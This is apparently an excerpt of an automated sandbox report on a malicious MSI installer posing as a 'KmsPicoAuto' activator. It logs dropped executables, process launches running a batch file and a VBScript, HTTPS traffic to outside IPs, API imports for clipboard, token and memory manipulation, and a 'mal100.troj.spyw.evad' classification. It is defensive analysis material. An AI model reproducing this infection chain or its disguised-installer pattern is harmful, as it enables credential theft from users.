Source: chrome.exe, 00000025.00000003.2423445169.00006F700140C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000025.00000002.2472714497.00006F700020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000025.00000002.2472714497.00006F700020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000025.00000002.2472714497.00006F700020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000025.00000002.2472714497.00006F700020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000025.00000002.2476421076.00006F7000798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000025.00000002.2476421076.00006F7000798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 00000025.00000002.2474807519.00006F70004D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000025.00000003.2432991019.00006F7001D24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000025.00000003.2431904184.00006F7000EC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2431825739.00006F7001C8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2432106857.00006F7001C5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2500808820.00006F7001C94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2432001221.00006F7001C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2432991019.00006F7001D24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000025.00000003.2432001221.00006F7001C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2432991019.00006F7001D24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2431304364.00006F7001CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.kK1dM3um3so.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000025.00000003.2432001221.00006F7001C40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2432991019.00006F7001D24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000003.2431304364.00006F7001CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
Source: chrome.exe, 00000025.00000002.2476091798.00006F7000741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000025.00000002.2476091798.00006F7000741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000025.00000002.2476091798.00006F7000741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000025.00000002.2476091798.00006F7000741000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000025.00000002.2473345972.00006F70002C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49925
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49902
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.7:49894 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\putt.exe

Code function: 22_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

22_2_004050F9

Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com

Code function: 32_2_0056F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

32_2_0056F7C7

Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com

Code function: 32_2_0056F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

32_2_0056F55C

Source: C:\Users\user\AppData\Local\Temp\putt.exe

Code function: 22_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

22_2_004044D1

Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com

Code function: 32_2_00589FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

32_2_00589FD2

System Summary

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\putt.exe			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\din[1].exe			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com

Code function: 32_2_0050FFE0 CloseHandle,NtProtectVirtualMemory,

32_2_0050FFE0

Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com

Code function: 32_2_00564763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,

32_2_00564763

Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com

Code function: 32_2_00551B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

32_2_00551B4D

Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 22_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,		22_2_004038AF
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0055F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		32_2_0055F20D

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\53c168.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC32D.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC39B.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC3DB.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{8549544C-E110-43F1-890F-41A5D528F5AA}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC439.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\53c16a.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\53c16a.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC534.tmp	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSIC32D.tmp

Jump to behavior

Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9BF6AC0	12_2_00007FF6D9BF6AC0
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C2FB18	12_2_00007FF6D9C2FB18
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C14ACC	12_2_00007FF6D9C14ACC
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C06AC7	12_2_00007FF6D9C06AC7
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C37A7C	12_2_00007FF6D9C37A7C
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C48A80	12_2_00007FF6D9C48A80
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C38AA8	12_2_00007FF6D9C38AA8
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C23A33	12_2_00007FF6D9C23A33
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C3F948	12_2_00007FF6D9C3F948
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C2FD1C	12_2_00007FF6D9C2FD1C
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C41CAC	12_2_00007FF6D9C41CAC
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C33BF4	12_2_00007FF6D9C33BF4
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C0AB4C	12_2_00007FF6D9C0AB4C
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C3AB40	12_2_00007FF6D9C3AB40
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C41F2C	12_2_00007FF6D9C41F2C
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C0EEDC	12_2_00007FF6D9C0EEDC
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C3EE38	12_2_00007FF6D9C3EE38
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C04DB4	12_2_00007FF6D9C04DB4
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C0CD40	12_2_00007FF6D9C0CD40
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C3412C	12_2_00007FF6D9C3412C
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C180E8	12_2_00007FF6D9C180E8
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C080A0	12_2_00007FF6D9C080A0
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C460A0	12_2_00007FF6D9C460A0
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C26010	12_2_00007FF6D9C26010
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C43FC4	12_2_00007FF6D9C43FC4
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C35F50	12_2_00007FF6D9C35F50
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9BF5F60	12_2_00007FF6D9BF5F60
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C2F2F8	12_2_00007FF6D9C2F2F8
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C3F2D0	12_2_00007FF6D9C3F2D0
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C3D2D4	12_2_00007FF6D9C3D2D4
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C392C4	12_2_00007FF6D9C392C4
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C1B2F0	12_2_00007FF6D9C1B2F0
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C17268	12_2_00007FF6D9C17268
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C241C8	12_2_00007FF6D9C241C8
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C25160	12_2_00007FF6D9C25160
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C3C514	12_2_00007FF6D9C3C514
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C2F4FC	12_2_00007FF6D9C2F4FC
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C1A4E0	12_2_00007FF6D9C1A4E0
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C1E4A0	12_2_00007FF6D9C1E4A0
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C0E468	12_2_00007FF6D9C0E468
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C3A464	12_2_00007FF6D9C3A464
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C42410	12_2_00007FF6D9C42410
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C313E8	12_2_00007FF6D9C313E8
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C2F708	12_2_00007FF6D9C2F708
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C47600	12_2_00007FF6D9C47600
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C0B618	12_2_00007FF6D9C0B618
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9BF85C0	12_2_00007FF6D9BF85C0
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C1F5C0	12_2_00007FF6D9C1F5C0
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C165C4	12_2_00007FF6D9C165C4
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C035E0	12_2_00007FF6D9C035E0
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9BFD590	12_2_00007FF6D9BFD590
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C2F90C	12_2_00007FF6D9C2F90C
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C138EC	12_2_00007FF6D9C138EC
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C0389C	12_2_00007FF6D9C0389C
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C31858	12_2_00007FF6D9C31858
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C22804	12_2_00007FF6D9C22804
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C1881C	12_2_00007FF6D9C1881C
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C427C0	12_2_00007FF6D9C427C0
Source: C:\Windows\Installer\MSIC534.tmp	Code function: 12_2_00007FF6D9C43790	12_2_00007FF6D9C43790
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB2E4B52	17_2_00007FFAAB2E4B52
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FFAAB2E49FA	17_2_00007FFAAB2E49FA
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 22_2_0040737E	22_2_0040737E
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 22_2_00406EFE	22_2_00406EFE
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 22_2_004079A2	22_2_004079A2
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 22_2_004049A8	22_2_004049A8
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00518017	32_2_00518017
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0050E144	32_2_0050E144
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_004FE1F0	32_2_004FE1F0
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0052A26E	32_2_0052A26E
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_004F22AD	32_2_004F22AD
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_005122A2	32_2_005122A2
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0050C624	32_2_0050C624
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0052E87F	32_2_0052E87F
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0057C8A4	32_2_0057C8A4
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00562A05	32_2_00562A05
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00526ADE	32_2_00526ADE
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00558BFF	32_2_00558BFF
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0050CD7A	32_2_0050CD7A
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_0051CE10	32_2_0051CE10
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00527159	32_2_00527159
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_004F9240	32_2_004F9240
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00585311	32_2_00585311
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_004F96E0	32_2_004F96E0
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00511704	32_2_00511704
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00511A76	32_2_00511A76
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_004F9B60	32_2_004F9B60
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00517B8B	32_2_00517B8B
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00511D20	32_2_00511D20
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00517DBA	32_2_00517DBA
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00511FE7	32_2_00511FE7

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\615578\Participating.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49

Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: String function: 00510DA0 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: String function: 0050FD52 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: String function: 004062CF appears 57 times

Source: 69633f.msi	Binary or memory string: OriginalFilenameviewer.exeF vs 69633f.msi
Source: 69633f.msi	Binary or memory string: OriginalFilenameAICustAct.dllF vs 69633f.msi

Source: classification engine

Classification label: mal100.troj.spyw.evad.winMSI@59/75@7/7

Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com

Code function: 32_2_005641FA GetLastError,FormatMessageW,

32_2_005641FA

Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00552010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		32_2_00552010
Source: C:\Users\user\AppData\Local\Temp\615578\Participating.com	Code function: 32_2_00551A0B AdjustTokenPrivileges,CloseHandle,		32_2_00551A0B

Source: C:\Users\user\AppData\Local\Temp\putt.exe

22_2_004044D1

Source: C:\Windows\Installer\MSIC534.tmp

Code function: 12_2_00007FF6D9BF5A80 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,CloseHandle,

12_2_00007FF6D9BF5A80

Source: C:\Windows\Installer\MSIC534.tmp

Code function: 12_2_00007FF6D9BF6AC0 CoInitializeEx,CoCreateInstance,VariantInit,IUnknown_QueryService,IUnknown_QueryInterface_Proxy,IUnknown_QueryInterface_Proxy,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,VariantInit,LocalFree,LocalFree,SysAllocString,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

12_2_00007FF6D9BF6AC0

Source: C:\Windows\Installer\MSIC534.tmp

Code function: 12_2_00007FF6D9BF1B70 LoadResource,LockResource,SizeofResource,

12_2_00007FF6D9BF1B70

Source: C:\Windows\System32\msiexec.exe

File created: C:\Program Files (x86)\SoftPortable

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3964:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03

Source: C:\Windows\System32\msiexec.exe

File created: C:\Users\user~1\AppData\Local\Temp\MSIFDC5.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KmsPicoAuto\1.bat" "

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\cscript.exe cscript.exe //nologo "C:\Users\user~1\AppData\Local\Temp\runner.vbs"

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Windows\System32\msiexec.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: chrome.exe, 00000025.00000002.2475629199.00006F7000695000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: Participating.com, 00000020.00000002.2526414694.00000000043E5000.00000004.00000800.00020000.00000000.sdmp, U37QQIEKN.32.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\69633f.msi"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding D70795A19597363BCA1BA6E959046918 C
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 98F0657E4B4BD5B7A8EF6A74F6816EC8
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSIC534.tmp "C:\Windows\Installer\MSIC534.tmp" /DontWait "C:\Program Files (x86)\SoftPortable\KmsPicoAuto\1.bat"
Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\SoftPortable\KmsPicoAuto\1.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
